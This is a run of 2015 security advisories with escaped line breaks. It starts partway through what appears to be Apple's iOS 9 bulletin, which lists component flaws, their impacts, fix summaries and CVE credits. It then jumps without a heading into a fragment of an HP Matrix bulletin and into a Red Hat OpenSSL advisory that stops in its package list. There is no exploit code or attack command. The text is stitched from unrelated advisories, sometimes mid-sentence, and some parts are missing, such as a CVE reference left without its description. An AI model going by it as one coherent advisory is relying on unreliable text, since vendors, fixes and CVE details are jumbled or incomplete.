touch (5th generation) and later, iPad 2 and later\nImpact: An attacker may be able to create unintended cookies for a\nwebsite\nDescription: WebKit would accept multiple cookies to be set in the\ndocument.cookie API. This issue was addressed through improved\nparsing. \nCVE-ID\nCVE-2015-3801 : Erling Ellingsen of Facebook\n\nCFNetwork FTPProtocol\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Malicious FTP servers may be able to cause the client to\nperform reconnaissance on other hosts\nDescription: An issue existed in FTP packet handling if clients were\nusing an FTP proxy. \nCVE-ID\nCVE-2015-5912 : Amit Klein\n\nCFNetwork HTTPProtocol\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A maliciously crafted URL may be able to bypass HTTP Strict\nTransport Security (HSTS) and leak sensitive data\nDescription: A URL parsing vulnerability existed in HSTS handling. \nThis issue was addressed through improved URL parsing. \nCVE-ID\nCVE-2015-5858 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua\nUniversity\n\nCFNetwork HTTPProtocol\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A malicious website may be able to track users in Safari\nprivate browsing mode\nDescription: An issue existed in the handling of HSTS state in\nSafari private browsing mode. This issue was addressed through\nimproved state handling. \nCVE-ID\nCVE-2015-5860 : Sam Greenhalgh of RadicalResearch Ltd\n\nCFNetwork Proxies\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Connecting to a malicious web proxy may set malicious\ncookies for a website\nDescription: An issue existed in the handling of proxy connect\nresponses. This issue was addressed by removing the set-cookie header\nwhile parsing the connect response. \nCVE-ID\nCVE-2015-5841 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua\nUniversity\n\nCFNetwork SSL\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An attacker with a privileged network position may intercept\nSSL/TLS connections\nDescription: A certificate validation issue existed in NSURL when a\ncertificate changed. This issue was addressed through improved\ncertificate validation. \nCVE-ID\nCVE-2015-5824 : Timothy J. Wood of The Omni Group\n\nCFNetwork SSL\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An attacker may be able to decrypt data protected by SSL\nDescription: There are known attacks on the confidentiality of RC4. \nAn attacker could force the use of RC4, even if the server preferred\nbetter ciphers, by blocking TLS 1.0 and higher connections until\nCFNetwork tried SSL 3.0, which only allows RC4. This issue was\naddressed by removing the fallback to SSL 3.0. \n\nCoreAnimation\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A malicious application may be able to leak sensitive user\ninformation\nDescription: Applications could access the screen framebuffer while\nthey were in the background. This issue was addressed with improved\naccess control on IOSurfaces. \nCVE-ID\nCVE-2015-5880 : Jin Han, Su Mon Kywe, Qiang Yan, Robert Deng, Debin\nGao, Yingjiu Li of School of Information Systems Singapore Management\nUniversity, Feng Bao and Jianying Zhou of Cryptography and Security\nDepartment Institute for Infocomm Research\n\nCoreCrypto\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An attacker may be able to determine a private key\nDescription: By observing many signing or decryption attempts, an\nattacker may have been able to determine the RSA private key. This\nissue was addressed using improved encryption algorithms. \n\nCoreText\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2015-5874 : John Villamil (@day6reak), Yahoo Pentest Team\n\nData Detectors Engine\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Processing a maliciously crafted text file may lead to\narbitrary code execution\nDescription: Memory corruption issues existed in the processing of\ntext files. These issues were addressed through improved bounds\nchecking. \nCVE-ID\nCVE-2015-5829 : M1x7e1 of Safeye Team (www.safeye.org)\n\nDev Tools\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A memory corruption issue existed in dyld. This was\naddressed through improved memory handling. \nCVE-ID\nCVE-2015-5876 : beist of grayhash\n\ndyld\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to bypass code signing\nDescription: An issue existed with validation of the code signature\nof executables. This issue was addressed through improved bounds\nchecking. \nCVE-ID\nCVE-2015-5839 : @PanguTeam, TaiG Jailbreak Team\n\nDisk Images\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: A memory corruption issue existed in DiskImages. This\nissue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-5847 : Filippo Bigarella, Luca Todesco\n\nGame Center\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A malicious Game Center application may be able to access a\nplayer\u0027s email address\nDescription: An issue existed in Game Center in the handling of a\nplayer\u0027s email. This issue was addressed through improved access\nrestrictions. \nCVE-ID\nCVE-2015-5855 : Nasser Alnasser\n\nICU\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Multiple vulnerabilities in ICU\nDescription: Multiple vulnerabilities existed in ICU versions prior\nto 53.1.0. These issues were addressed by updating ICU to version\n55.1. \nCVE-ID\nCVE-2014-8146\nCVE-2015-1205\n\nIOAcceleratorFamily\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An issue existed that led to the disclosure of kernel\nmemory content. This issue was addressed through improved bounds\nchecking. \nCVE-ID\nCVE-2015-5834 : Cererdlong of Alibaba Mobile Security Team\n\nIOAcceleratorFamily\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: A memory corruption issue existed in\nIOAcceleratorFamily. This issue was addressed through improved memory\nhandling. \nCVE-ID\nCVE-2015-5848 : Filippo Bigarella\n\nIOHIDFamily\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A memory corruption issue existed in IOHIDFamily. This\nissue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-5867 : moony li of Trend Micro\n\nIOKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A memory corruption issue existed in the kernel. This\nissue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-5844 : Filippo Bigarella\nCVE-2015-5845 : Filippo Bigarella\nCVE-2015-5846 : Filippo Bigarella\n\nIOMobileFrameBuffer\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: A memory corruption issue existed in\nIOMobileFrameBuffer. This issue was addressed through improved memory\nhandling. \nCVE-ID\nCVE-2015-5843 : Filippo Bigarella\n\nIOStorageFamily\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A local attacker may be able to read kernel memory\nDescription: A memory initialization issue existed in the kernel. \nThis issue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-5863 : Ilja van Sprundel of IOActive\n\niTunes Store\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: AppleID credentials may persist in the keychain after sign\nout\nDescription: An issue existed in keychain deletion. This issue was\naddressed through improved account cleanup. \nCVE-ID\nCVE-2015-5832 : Kasif Dekel from Check Point Software Technologies\n\nJavaScriptCore\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may lead to arbitrary\ncode execution\nDescription: Memory corruption issues existed in WebKit. These\nissues were addressed through improved memory handling. \nCVE-ID\nCVE-2015-5791 : Apple\nCVE-2015-5793 : Apple\nCVE-2015-5814 : Apple\nCVE-2015-5816 : Apple\nCVE-2015-5822 : Mark S. Miller of Google\nCVE-2015-5823 : Apple\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the kernel. This\nissue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-5868 : Cererdlong of Alibaba Mobile Security Team\nCVE-2015-5896 : Maxime Villard of m00nbsd\nCVE-2015-5903 : CESG\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A local attacker may control the value of stack cookies\nDescription: Multiple weaknesses existed in the generation of user\nspace stack cookies. This was addressed through improved generation\nof stack cookies. \nCVE-ID\nCVE-2013-3951 : Stefan Esser\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A local process can modify other processes without\nentitlement checks\nDescription: An issue existed where root processes using the\nprocessor_set_tasks API were allowed to retrieve the task ports of\nother processes. This issue was addressed through added entitlement\nchecks. \nCVE-ID\nCVE-2015-5882 : Pedro Vilaca, working from original research by Ming-\nchieh Pan and Sung-ting Tsai; Jonathan Levin\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An attacker may be able to launch denial of service attacks\non targeted TCP connections without knowing the correct sequence\nnumber\nDescription: An issue existed in xnu\u0027s validation of TCP packet\nheaders. This issues was addressed through improved TCP packet header\nvalidation. \nCVE-ID\nCVE-2015-5879 : Jonathan Looney\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An attacker in a local LAN segment may disable IPv6 routing\nDescription: An insufficient validation issue existed in handling of\nIPv6 router advertisements that allowed an attacker to set the hop\nlimit to an arbitrary value. This issue was addressed by enforcing a\nminimum hop limit. \nCVE-ID\nCVE-2015-5869 : Dennis Spindel Ljungmark\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A local user may be able to determine kernel memory layout\nDescription: An issue existed in XNU that led to the disclosure of\nkernel memory. This was addressed through improved initialization of\nkernel memory structures. \nCVE-ID\nCVE-2015-5842 : beist of grayhash\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A local user may be able to cause a system denial of service\nDescription: An issue existed in HFS drive mounting. This was\naddressed by additional validation checks. \nCVE-ID\nCVE-2015-5748 : Maxime Villard of m00nbsd\n\nlibc\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the kernel. This\nissue was addressed through improved memory handling. \nCVE-ID\nCVE-2014-8611 : Adrian Chadd and Alfred Perlstein of Norse\nCorporation\n\nlibpthread\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the kernel. This\nissue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-5899 : Lufeng Li of Qihoo 360 Vulcan Team\n\nMail\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An attacker can send an email that appears to come from a\ncontact in the recipient\u0027s address book\nDescription: An issue existed in the handling of the sender\u0027s\naddress. This issue was addressed through improved validation. \nCVE-ID\nCVE-2015-5857 : Emre Saglam of salesforce.com\n\nMultipeer Connectivity\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A local attacker may be able to observe unprotected\nmultipeer data\nDescription: An issue existed in convenience initializer handling in\nwhich encryption could be actively downgraded to a non-encrypted\nsession. This issue was addressed by changing the convenience\ninitializer to require encryption. \nCVE-ID\nCVE-2015-5851 : Alban Diquet (@nabla_c0d3) of Data Theorem\n\nNetworkExtension\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An uninitialized memory issue in the kernel led to the\ndisclosure of kernel memory content. This issue was addressed through\nmemory initialization. \nCVE-ID\nCVE-2015-5831 : Maxime Villard of m00nbsd\n\nOpenSSL\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Multiple vulnerabilities in OpenSSL\nDescription: Multiple vulnerabilities existed in OpenSSL versions\nprior to 0.9.8zg. These were addressed by updating OpenSSL to version\n0.9.8zg. \nCVE-ID\nCVE-2015-0286\nCVE-2015-0287\n\nPluginKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A malicious enterprise application can install extensions\nbefore the application has been trusted\nDescription: An issue existed in the validation of extensions during\ninstallation. This was addressed through improved app verification. \nCVE-ID\nCVE-2015-5837 : Zhaofeng Chen, Hui Xue, and Tao (Lenx) Wei of\nFireEye, Inc. \n\nremovefile\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Processing malicious data may lead to unexpected application\ntermination\nDescription: An overflow fault existed in the checkint division\nroutines. This issue was addressed with improved division routines. \nCVE-ID\nCVE-2015-5840 : an anonymous researcher\n\nSafari\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A local user may be able to read Safari bookmarks on a\nlocked iOS device without a passcode\nDescription: Safari bookmark data was encrypted with a key protected\nonly by the hardware UID. This issue was addressed by encrypting the\nSafari bookmark data with a key protected by the hardware UID and the\nuser\u0027s passcode. \nCVE-ID\nCVE-2015-5903 : Jonathan Zdziarski\n\nSafari\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a malicious website may lead to user interface\nspoofing\nDescription: An issue may have allowed a website to display content\nwith a URL from a different website. This issue was addressed through\nimproved URL handling. \nCVE-ID\nCVE-2015-5904 : Erling Ellingsen of Facebook, Lukasz Pilorz\n\nSafari\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a malicious website may lead to user interface\nspoofing\nDescription: Navigating to a malicious website with a malformed\nwindow opener may have allowed the display of arbitrary URLs. This\nissue was addressed through improved handling of window openers. \nCVE-ID\nCVE-2015-5905 : Keita Haga of keitahaga.com\n\nSafari\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Users may be tracked by malicious websites using client\ncertificates\nDescription: An issue existed in Safari\u0027s client certificate\nmatching for SSL authentication. This issue was addressed through\nimproved matching of valid client certificates. \nCVE-ID\nCVE-2015-1129 : Stefan Kraus of fluid Operations AG, Sylvain Munaut\nof Whatever s.a. \n\nSafari\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a malicious website may lead to user interface\nspoofing\nDescription: Multiple user interface inconsistencies may have\nallowed a malicious website to display an arbitrary URL. These issues\nwere addressed through improved URL display logic. \nCVE-ID\nCVE-2015-5764 : Antonio Sanso (@asanso) of Adobe\nCVE-2015-5765 : Ron Masas\nCVE-2015-5767 : Krystian Kloskowski via Secunia, Masato Kinugawa\n\nSafari Safe Browsing\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Navigating to the IP address of a known malicious website\nmay not trigger a security warning\nDescription: Safari\u0027s Safe Browsing feature did not warn users when\nvisiting known malicious websites by their IP addresses. The issue\nwas addressed through improved malicious site detection. \nRahul M of TagsDoc\n\nSecurity\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A malicious app may be able to intercept communication\nbetween apps\nDescription: An issue existed that allowed a malicious app to\nintercept URL scheme communication between apps. This was mitigated\nby displaying a dialog when a URL scheme is used for the first time. \nCVE-ID\nCVE-2015-5835 : Teun van Run of FiftyTwoDegreesNorth B.V.; XiaoFeng\nWang of Indiana University, Luyi Xing of Indiana University, Tongxin\nLi of Peking University, Tongxin Li of Peking University, Xiaolong\nBai of Tsinghua University\n\nSiri\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A person with physical access to an iOS device may be able\nto use Siri to read notifications of content that is set not to be\ndisplayed at the lock screen\nDescription: When a request was made to Siri, client side\nrestrictions were not being checked by the server. This issue was\naddressed through improved restriction checking. \nCVE-ID\nCVE-2015-5892 : Robert S Mozayeni, Joshua Donvito\n\nSpringBoard\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A person with physical access to an iOS device can reply to\nan audio message from the lock screen when message previews from the\nlock screen are disabled\nDescription: A lock screen issue allowed users to reply to audio\nmessages when message previews were disabled. This issue was\naddressed through improved state management. \nCVE-ID\nCVE-2015-5861 : Daniel Miedema of Meridian Apps\n\nSpringBoard\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A malicious application may be able to spoof another\napplication\u0027s dialog windows\nDescription: An access issue existed with privileged API calls. This\nissue was addressed through additional restrictions. \nCVE-ID\nCVE-2015-5838 : Min (Spark) Zheng, Hui Xue, Tao (Lenx) Wei, John C.S. \nLui\n\nSQLite\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Multiple vulnerabilities in SQLite v3.8.5\nDescription: Multiple vulnerabilities existed in SQLite v3.8.5. \nThese issues were addressed by updating SQLite to version 3.8.10.2. \nCVE-ID\nCVE-2015-5895\n\ntidy\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may lead to arbitrary\ncode execution\nDescription: A memory corruption issue existed in Tidy. This issues\nwas addressed through improved memory handling. \nCVE-ID\nCVE-2015-5522 : Fernando Munoz of NULLGroup.com\nCVE-2015-5523 : Fernando Munoz of NULLGroup.com\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Object references may be leaked between isolated origins on\ncustom events, message events and pop state events\nDescription: An object leak issue broke the isolation boundary\nbetween origins. This issue was addressed through improved isolation\nbetween origins. \nCVE-ID\nCVE-2015-5827 : Gildas\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may lead to arbitrary\ncode execution\nDescription: Memory corruption issues existed in WebKit. These\nissues were addressed through improved memory handling. \nCVE-ID\nCVE-2015-5789 : Apple\nCVE-2015-5790 : Apple\nCVE-2015-5792 : Apple\nCVE-2015-5794 : Apple\nCVE-2015-5795 : Apple\nCVE-2015-5796 : Apple\nCVE-2015-5797 : Apple\nCVE-2015-5799 : Apple\nCVE-2015-5800 : Apple\nCVE-2015-5801 : Apple\nCVE-2015-5802 : Apple\nCVE-2015-5803 : Apple\nCVE-2015-5804 : Apple\nCVE-2015-5805\nCVE-2015-5806 : Apple\nCVE-2015-5807 : Apple\nCVE-2015-5809 : Apple\nCVE-2015-5810 : Apple\nCVE-2015-5811 : Apple\nCVE-2015-5812 : Apple\nCVE-2015-5813 : Apple\nCVE-2015-5817 : Apple\nCVE-2015-5818 : Apple\nCVE-2015-5819 : Apple\nCVE-2015-5821 : Apple\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a malicious website may lead to unintended dialing\nDescription: An issue existed in handling of tel://, facetime://,\nand facetime-audio:// URLs. This issue was addressed through improved\nURL handling. \nCVE-ID\nCVE-2015-5820 : Andrei Neculaesei, Guillaume Ross\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: QuickType may learn the last character of a password in a\nfilled-in web form\nDescription: An issue existed in WebKit\u0027s handling of password input\ncontext. This issue was addressed through improved input context\nhandling. \nCVE-ID\nCVE-2015-5906 : Louis Romero of Google Inc. \n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An attacker in a privileged network position may be able to\nredirect to a malicious domain\nDescription: An issue existed in the handling of resource caches on\nsites with invalid certificates. The issue was addressed by rejecting\nthe application cache of domains with invalid certificates. \nCVE-ID\nCVE-2015-5907 : Yaoqi Jia of National University of Singapore (NUS)\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A malicious website may exfiltrate data cross-origin\nDescription: Safari allowed cross-origin stylesheets to be loaded\nwith non-CSS MIME types which could be used for cross-origin data\nexfiltration. This issue was addressed by limiting MIME types for\ncross-origin stylesheets. \nCVE-ID\nCVE-2015-5826 : filedescriptor, Chris Evans\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: The Performance API may allow a malicious website to leak\nbrowsing history, network activity, and mouse movements\nDescription: WebKit\u0027s Performance API could have allowed a malicious\nwebsite to leak browsing history, network activity, and mouse\nmovements by measuring time. This issue was addressed by limiting\ntime resolution. \nCVE-ID\nCVE-2015-5825 : Yossi Oren et al. of Columbia University\u0027s Network\nSecurity Lab\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An attacker in a privileged network position may be able to\nleak sensitive user information\nDescription: An issue existed with Content-Disposition headers\ncontaining type attachment. This issue was addressed by disallowing\nsome functionality for type attachment pages. \nCVE-ID\nCVE-2015-5921 : Mickey Shkatov of the Intel(r) Advanced Threat\nResearch Team, Daoyuan Wu of Singapore Management University, Rocky\nK. C. Chang of Hong Kong Polytechnic University, Lukasz Pilorz,\nsuperhei of www.knownsec.com\n\nWebKit Canvas\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a malicious website may disclose image data from\nanother website\nDescription: A cross-origin issue existed with \"canvas\" element\nimages in WebKit. This was addressed through improved tracking of\nsecurity origins. \nCVE-ID\nCVE-2015-5788 : Apple\n\nWebKit Page Loading\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: WebSockets may bypass mixed content policy enforcement\nDescription: An insufficient policy enforcement issue allowed\nWebSockets to load mixed content. This issue was addressed by\nextending mixed content policy enforcement to WebSockets. \nKevin G Jones of Higher Logic\n\nInstallation note:\n\nThis update is available through iTunes and Software Update on your\niOS device, and will not appear in your computer\u0027s Software Update\napplication, or in the Apple Downloads site. Make sure you have an\nInternet connection and have installed the latest version of iTunes\nfrom www.apple.com/itunes/\n\niTunes and Software Update on the device will automatically check\nApple\u0027s update server on its weekly schedule. When an update is\ndetected, it is downloaded and the option to be installed is\npresented to the user when the iOS device is docked. We recommend\napplying the update immediately if possible. Selecting Don\u0027t Install\nwill present the option the next time you connect your iOS device. \n\nThe automatic update process may take up to a week depending on the\nday that iTunes or the device checks for updates. You may manually\nobtain the update via the Check for Updates button within iTunes, or\nthe Software Update on your device. \n\nTo check that the iPhone, iPod touch, or iPad has been updated:\n\n* Navigate to Settings\n* Select General\n* Select About. The version after applying this update\nwill be \"9\". \n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - http://gpgtools.org\n\niQIcBAEBCAAGBQJV+avFAAoJEBcWfLTuOo7tAOsQAKVBs+YG3HuMy0mc0rnpbRtU\n+bjdnzwBeQE6C6Fp/SlZroyYtutnPw9QoFbUpY9Kkcer08uPap6kUAcF72fD51tG\nUYmIe5WvDSMWD98pKsgDGUVfGdU1h135KpSfDgoiQrZK2GAPe2xCDupD42jIPLk2\n3qSyrYnVzfrCZ8uBk9j4gqoF5Ki6JSP/3Qm7hiPfhQXcMyQyIQ+2tJyQcSyGf5OM\nRgkmHwjIjkEb8jwwQ6h4LPMNuvqq8Kv6P4wQQeUl7RdtLJfafmFg+mV7bSmV/b28\nHk5EHQrQJ5fVl9jBFxti6aZrhrNr5yRL9yAdrpNB0rWfDN0z9emyGRrW2vli+Zv+\n0xXBZfAiNVAP53ou4gyVkLDZ+zx5lsWSADU1QWbIR2DY+WXUIN5QJ/ayFkNN9gqD\nWrFGHOc/l+Rq82uQi4ND0jTcYqhBG0MyooJf29orPA2tZeKvrcA4/6w12w6eJ7qA\naW5J+BByErqWft42I/JT3CbnK+GBEDHnj4GAeSMHuNolPNsoH5cv0G4yKigW0zLS\n81AzADTcBtKtaSD9aBAPAL6TTGUySmupF8flhHTMcpZh1MbAqo+bObMXUMvCrmST\nyq+5/R0gVuMN0BQ7adwI0akYApuqrNi/Mp9zT+JlU2wiSfaHm58Ugf8YAmc+sfjT\nrHWi1bvzskkrxRfuQ4mX\n=MnPh\n-----END PGP SIGNATURE-----\n. \n\nRelease Date: 2015-08-24\nLast Updated: 2015-08-24\n\nPotential Security Impact: Remote unauthorized modification, unauthorized\naccess, or unauthorized disclosure of information. Please order\nthe latest version of the HP Matrix Operating Environment 7.5.0 DVD #2 ISO\nfrom the following location:\n\nhttp://www.hp.com/go/insightupdates\n\nChoose the orange Select button. This presents the HP Insight Management\nMedia order page. Choose Insight Management 7.5 DVD-2-ZIP August 2015 from\nthe Software specification list. Fill out the rest of the form and submit it. \n\nHP has addressed these vulnerabilities for the affected software components\nbundled with the HP Matrix Operating Environment in the following HP Security\nBulletins. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssl security update\nAdvisory ID: RHSA-2015:0715-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-0715.html\nIssue date: 2015-03-23\nCVE Names: CVE-2015-0209 CVE-2015-0286 CVE-2015-0287 \n CVE-2015-0288 CVE-2015-0289 CVE-2015-0292 \n CVE-2015-0293 \n=====================================================================\n\n1. Summary:\n\nUpdated openssl packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library. \n(CVE-2015-0286)\n\nAn integer underflow flaw, leading to a buffer overflow, was found in the\nway OpenSSL decoded malformed Base64-encoded inputs. Note: this flaw is not exploitable via the TLS/SSL protocol because\nthe data being transferred is not Base64-encoded. (CVE-2015-0292)\n\nA denial of service flaw was found in the way OpenSSL handled SSLv2\nhandshake messages. A remote attacker could use this flaw to cause a\nTLS/SSL server using OpenSSL to exit on a failed assertion if it had both\nthe SSLv2 protocol and EXPORT-grade cipher suites enabled. (CVE-2015-0293)\n\nA use-after-free flaw was found in the way OpenSSL imported malformed\nElliptic Curve private keys. A specially crafted key file could cause an\napplication using OpenSSL to crash when imported. (CVE-2015-0209)\n\nAn out-of-bounds write flaw was found in the way OpenSSL reused certain\nASN.1 structures. An attacker able to make an application using OpenSSL\nverify, decrypt, or parse a specially crafted PKCS#7 input could cause that\napplication to crash. (CVE-2015-0289)\n\nRed Hat would like to thank the OpenSSL project for reporting\nCVE-2015-0286, CVE-2015-0287, CVE-2015-0288, CVE-2015-0289, CVE-2015-0292,\nand CVE-2015-0293. For the update to take\neffect, all services linked to the OpenSSL library must be restarted, or\nthe system rebooted. \n\n4. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-30.el6_6.7.src.rpm\n\ni386:\nopenssl-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.7.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-1.0.1e-30.el6_6.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.7.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-perl-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-static-1.0.1e-30.el6_6.7.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.7.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.7.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.7.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.7.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.7.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 